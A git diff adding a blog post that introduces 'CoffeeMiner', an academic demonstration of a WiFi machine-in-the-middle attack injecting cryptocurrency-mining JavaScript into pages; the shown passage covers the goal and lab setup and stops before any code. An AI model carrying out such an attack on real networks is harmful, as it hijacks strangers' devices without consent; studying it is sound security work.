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 \ No newline at end of file diff --git a/blogo-input/img/posts/coffeeMiner/coinhive-monero-logo.jpg b/blogo-input/img/posts/coffeeMiner/coinhive-monero-logo.jpg new file mode 100644 index 0000000..cd8a5b1 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/coinhive-monero-logo.jpg differ diff --git a/blogo-input/img/posts/coffeeMiner/demo-realWiFi-video.png b/blogo-input/img/posts/coffeeMiner/demo-realWiFi-video.png new file mode 100644 index 0000000..edb56d2 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/demo-realWiFi-video.png differ diff --git a/blogo-input/img/posts/coffeeMiner/demo-video.png b/blogo-input/img/posts/coffeeMiner/demo-video.png new file mode 100644 index 0000000..715e544 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/demo-video.png differ diff --git a/blogo-input/img/posts/coffeeMiner/demo01.png b/blogo-input/img/posts/coffeeMiner/demo01.png new file mode 100644 index 0000000..216cd1c Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/demo01.png differ diff --git a/blogo-input/img/posts/coffeeMiner/demo02.png b/blogo-input/img/posts/coffeeMiner/demo02.png new file mode 100644 index 0000000..bf17bc5 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/demo02.png differ diff --git a/blogo-input/img/posts/coffeeMiner/network-scenario.png b/blogo-input/img/posts/coffeeMiner/network-scenario.png new file mode 100644 index 0000000..adfbeaa Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/network-scenario.png differ diff --git a/blogo-input/img/posts/coffeeMiner/scenario01.png b/blogo-input/img/posts/coffeeMiner/scenario01.png new file mode 100644 index 0000000..2408cd8 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/scenario01.png differ diff --git a/blogo-input/img/posts/coffeeMiner/scenario02.png b/blogo-input/img/posts/coffeeMiner/scenario02.png new file mode 100644 index 0000000..05d3991 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/scenario02.png differ diff --git a/blogo-input/img/posts/coffeeMiner/tweets.png b/blogo-input/img/posts/coffeeMiner/tweets.png new file mode 100644 index 0000000..cf37c5f Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/tweets.png differ diff --git a/blogo-input/img/posts/coffeeMiner/tweets.xcf b/blogo-input/img/posts/coffeeMiner/tweets.xcf new file mode 100644 index 0000000..c6462ad Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/tweets.xcf differ diff --git a/blogo-input/img/posts/coffeeMiner/tweets_small.png b/blogo-input/img/posts/coffeeMiner/tweets_small.png new file mode 100644 index 0000000..8f6ce76 Binary files /dev/null and b/blogo-input/img/posts/coffeeMiner/tweets_small.png differ diff --git a/blogo-input/posts/coffeeminer-hacking-wifi-cryptocurrency-miner.md b/blogo-input/posts/coffeeminer-hacking-wifi-cryptocurrency-miner.md new file mode 100644 index 0000000..29a6035 --- /dev/null +++ b/blogo-input/posts/coffeeminer-hacking-wifi-cryptocurrency-miner.md @@ -0,0 +1,426 @@ +# CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests + +*2018-01-04* + +***Disclamer: this article & project is for academic purposes only.*** + +Some weeks ago I read about [this Starbucks case](https://motherboard.vice.com/en_us/article/gyd5xq/starbucks-wi-fi-hijacked-peoples-laptops-to-mine-cryptocurrency-coinhive) where hackers hijacked laptops on the WiFi network to use the devices computing power to mine cryptocurrency, and I thought it might be interesting perform the attack in a different way. + +The goal of this article, is to explain how can be done the attack of MITM (Machine-In-The-Middle) to inject some javascript in the html pages, to force all the devices connected to a WiFi network to be mining a cryptocurrency for the attacker. + +![coffeeMiner](img/posts/coffeeMiner/coffeeMiner-logo-small.png "coffeeMiner") + +The objective is to have a script that performs autonomous attack on the WiFi network. It's what we have called **CoffeeMiner**, as it's a kind of attack that can be performed in the cafes WiFi networks. + + +## 1. The Scenario +The scenario will be some machines connected to the WiFi network, and the CoffeeMiner attacker intercepting the traffic between the users and the router. + +![network](img/posts/coffeeMiner/coffeeMiner-network-attack.png "network") + + +### 1.1 Scenario configuration +The real scenario is a WiFi with laptops and smartphones connected. We have tested in this real world scenario, and it works. But for this article, we will see more deeply how to set up in a virtual environment. + +We will use VirtualBox to deploy our virtual scenario https://www.virtualbox.org/ . + +First 